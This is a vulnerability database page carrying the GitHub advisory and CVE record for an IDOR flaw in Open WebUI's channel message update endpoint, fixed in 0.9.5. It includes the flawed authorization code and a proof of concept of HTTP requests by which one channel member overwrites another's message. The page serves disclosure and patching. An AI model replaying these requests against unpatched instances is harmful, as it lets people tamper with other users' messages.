Vulnerability-Lookup

GHSA-WWHQ-CX22-F7VV

Vulnerability from github – Published: 2026-05-14 20:25 – Updated: 2026-05-15 23:54

Summary

Open WebUI has an IDOR vulnerability in the update_message_by_id API endpoint

Details

Summary

An IDOR vulnerability exists in the Channels feature of Open WebUI, allowing any channel member to modify messages sent by other members (including administrators) within the same channel. This vulnerability affects the latest version (v0.8.12) of Open WebUI.

Details

In the update_message_by_id function, for group or dm type channels, only the caller's membership in the channel is checked via the is_user_channel_member function, without verifying message ownership. This allows any channel member to modify messages sent by other members within the same channel. The problematic code is as follows (https://github.com/open-webui/open-webui/blob/main/backend/open_webui/routers/channels.py#L1355) :

if channel.type in ['group', 'dm']:
    if not Channels.is_user_channel_member(channel.id, user.id, db=db):
        raise HTTPException(status_code=status.HTTP_403_FORBIDDEN, detail=ERROR_MESSAGES.DEFAULT())
else:
    if (
        user.role != 'admin'
        and message.user_id != user.id
        and not channel_has_access(user.id, channel, permission='write', strict=False, db=db)
    ):
        raise HTTPException(status_code=status.HTTP_403_FORBIDDEN, detail=ERROR_MESSAGES.DEFAULT())

try:
    message = Messages.update_message_by_id(message_id, form_data, db=db)

Non-group/dm types include a check for the user ID, while the group/dm type clearly lacks this verification.

PoC

The Channels feature is disabled by default and can be enabled first through the admin interface.

Create a group type channel with members including users test1 and test2.

POST /api/v1/channels/create HTTP/1.1
Content-Type: application/json

{
  "name": "idor-test-group",
  "type": "group",
  "user_ids": [
    "cfc3cb19-9e92-4bf7-8b72-1b47fe4ff62c",
    "b9997496-ff80-4c30-a366-95474f85e62b"
  ]
}

User test2 sends a message in the channel.

POST /api/v1/channels/9cff5240-6b22-4c85-bf74-b8dbfe471b16/messages/post HTTP/1.1
Content-Type: application/json
Authorization: Bearer <test2_token>

{"content":"This is test2 secret message"}

User test1 can directly modify the message that test2 just sent.

POST /api/v1/channels/9cff5240-6b22-4c85-bf74-b8dbfe471b16/messages/e0824c09-5712-4400-9b7a-b08eefcf15d3/update HTTP/1.1
Content-Type: application/json
Authorization: Bearer <test1_token>

{"content":"HACKED BY TEST1 - message tampered!"}

Messages sent by administrators can also be modified.

Impact

Malicious users can arbitrarily tamper with messages published by other users (including administrators), allowing them to disseminate false information.

Suggested Fix

Add a message ownership check in the group/dm branch of channels.py.

Severity

4.3 (Medium)


                  
                    CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "open-webui"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.9.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-45385"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-639"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-14T20:25:40Z",
    "nvd_published_at": "2026-05-15T21:16:36Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\nAn IDOR vulnerability exists in the Channels feature of `Open WebUI`, allowing any channel member to modify messages sent by other members (including administrators) within the same channel. This vulnerability affects the latest version (`v0.8.12`) of `Open WebUI`.\n\n### Details\nIn the `update_message_by_id` function, for `group` or `dm` type channels, only the caller\u0027s membership in the channel is checked via the `is_user_channel_member` function, without verifying message ownership. This allows any channel member to modify messages sent by other members within the same channel. The problematic code is as follows [(https://github.com/open-webui/open-webui/blob/main/backend/open_webui/routers/channels.py#L1355)](https://github.com/open-webui/open-webui/blob/main/backend/open_webui/routers/channels.py#L1355) :\n\n```python\nif channel.type in [\u0027group\u0027, \u0027dm\u0027]:\n    if not Channels.is_user_channel_member(channel.id, user.id, db=db):\n        raise HTTPException(status_code=status.HTTP_403_FORBIDDEN, detail=ERROR_MESSAGES.DEFAULT())\nelse:\n    if (\n        user.role != \u0027admin\u0027\n        and message.user_id != user.id\n        and not channel_has_access(user.id, channel, permission=\u0027write\u0027, strict=False, db=db)\n    ):\n        raise HTTPException(status_code=status.HTTP_403_FORBIDDEN, detail=ERROR_MESSAGES.DEFAULT())\n\ntry:\n    message = Messages.update_message_by_id(message_id, form_data, db=db)\n```\n\nNon-group/dm types include a check for the user ID, while the `group/dm` type clearly lacks this verification.\n\n### PoC\nThe `Channels` feature is disabled by default and can be enabled first through the `admin` interface.\n\u003cimg width=\"1024\" height=\"618\" alt=\"image\" src=\"https://github.com/user-attachments/assets/a36502e9-c6cd-41cd-a69c-8b6ac809768f\" /\u003e\n\nCreate a `group` type channel with members including users `test1` and `test2`.\n\n```\nPOST /api/v1/channels/create HTTP/1.1\nContent-Type: application/json\n\n{\n  \"name\": \"idor-test-group\",\n  \"type\": \"group\",\n  \"user_ids\": [\n    \"cfc3cb19-9e92-4bf7-8b72-1b47fe4ff62c\",\n    \"b9997496-ff80-4c30-a366-95474f85e62b\"\n  ]\n}\n```\n\nUser `test2` sends a message in the channel.\n\n```\nPOST /api/v1/channels/9cff5240-6b22-4c85-bf74-b8dbfe471b16/messages/post HTTP/1.1\nContent-Type: application/json\nAuthorization: Bearer \u003ctest2_token\u003e\n\n{\"content\":\"This is test2 secret message\"}\n```\n\nUser `test1` can directly modify the message that `test2` just sent.\n\n```\nPOST /api/v1/channels/9cff5240-6b22-4c85-bf74-b8dbfe471b16/messages/e0824c09-5712-4400-9b7a-b08eefcf15d3/update HTTP/1.1\nContent-Type: application/json\nAuthorization: Bearer \u003ctest1_token\u003e\n\n{\"content\":\"HACKED BY TEST1 - message tampered!\"}\n```\n\u003cimg width=\"1024\" height=\"216\" alt=\"image\" src=\"https://github.com/user-attachments/assets/77646d01-d501-4732-ac37-3ffb69f9f01f\" /\u003e\n\nMessages sent by administrators can also be modified.\n\n\u003cimg width=\"1024\" height=\"419\" alt=\"image\" src=\"https://github.com/user-attachments/assets/b32dc5eb-f810-41d3-b358-f000d8331761\" /\u003e\n\n\n### Impact\nMalicious users can arbitrarily tamper with messages published by other users (including administrators), allowing them to disseminate false information.\n\n### Suggested Fix\nAdd a message ownership check in the `group/dm` branch of `channels.py`.",
  "id": "GHSA-wwhq-cx22-f7vv",
  "modified": "2026-05-15T23:54:10Z",
  "published": "2026-05-14T20:25:40Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-wwhq-cx22-f7vv"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45385"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/open-webui/open-webui"
    },
    {
      "type": "WEB",
      "url": "https://github.com/open-webui/open-webui/releases/tag/v0.9.5"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Open WebUI has an IDOR vulnerability in the update_message_by_id API endpoint"
}

CVE-2026-45385 (GCVE-0-2026-45385)

Vulnerability from cvelistv5 – Published: 2026-05-15 20:29 – Updated: 2026-05-18 15:56

Title

Open WebUI: An IDOR vulnerability exists in the update_message_by_id API endpoint

Summary

Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.5, an IDOR vulnerability exists in the Channels feature of Open WebUI, allowing any channel member to modify messages sent by other members (including administrators) within the same channel. In the update_message_by_id function, for group or dm type channels, only the caller's membership in the channel is checked via the is_user_channel_member function, without verifying message ownership. This allows any channel member to modify messages sent by other members within the same channel. This vulnerability is fixed in 0.9.5.

Severity

4.3 (Medium)


                        
                          CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

CWE

CWE-639 - Authorization Bypass Through User-Controlled Key

Assigner

GitHub_M

References

1 reference

URL	Tags
https://github.com/open-webui/open-webui/security…	x_refsource_CONFIRM

Impacted products

1 product

Vendor	Product	Version
open-webui	open-webui	Affected: < 0.9.5

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-45385",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-05-18T15:56:23.211863Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-05-18T15:56:49.278Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-wwhq-cx22-f7vv"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "open-webui",
          "vendor": "open-webui",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 0.9.5"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.5, an IDOR vulnerability exists in the Channels feature of Open WebUI, allowing any channel member to modify messages sent by other members (including administrators) within the same channel. In the update_message_by_id function, for group or dm type channels, only the caller\u0027s membership in the channel is checked via the is_user_channel_member function, without verifying message ownership. This allows any channel member to modify messages sent by other members within the same channel. This vulnerability is fixed in 0.9.5."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-639",
              "description": "CWE-639: Authorization Bypass Through User-Controlled Key",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-05-15T20:29:36.884Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/open-webui/open-webui/security/advisories/GHSA-wwhq-cx22-f7vv",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-wwhq-cx22-f7vv"
        }
      ],
      "source": {
        "advisory": "GHSA-wwhq-cx22-f7vv",
        "discovery": "UNKNOWN"
      },
      "title": "Open WebUI: An IDOR vulnerability exists in the update_message_by_id API endpoint"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-45385",
    "datePublished": "2026-05-15T20:29:36.884Z",
    "dateReserved": "2026-05-12T00:51:29.087Z",
    "dateUpdated": "2026-05-18T15:56:49.278Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

GHSA-WWHQ-CX22-F7VV

Summary

Details

PoC

Impact

Suggested Fix

CVE-2026-45385 (GCVE-0-2026-45385)

Tags

Sightings

Nomenclature